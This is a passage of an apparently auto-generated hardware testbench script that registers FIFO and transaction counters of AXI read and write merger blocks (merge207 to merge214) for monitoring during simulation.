counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge207.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge208.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge208.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge209.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge209.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge210.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge210.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge211.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge211.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge212.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge212.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge213.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge213.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.d_rcount")
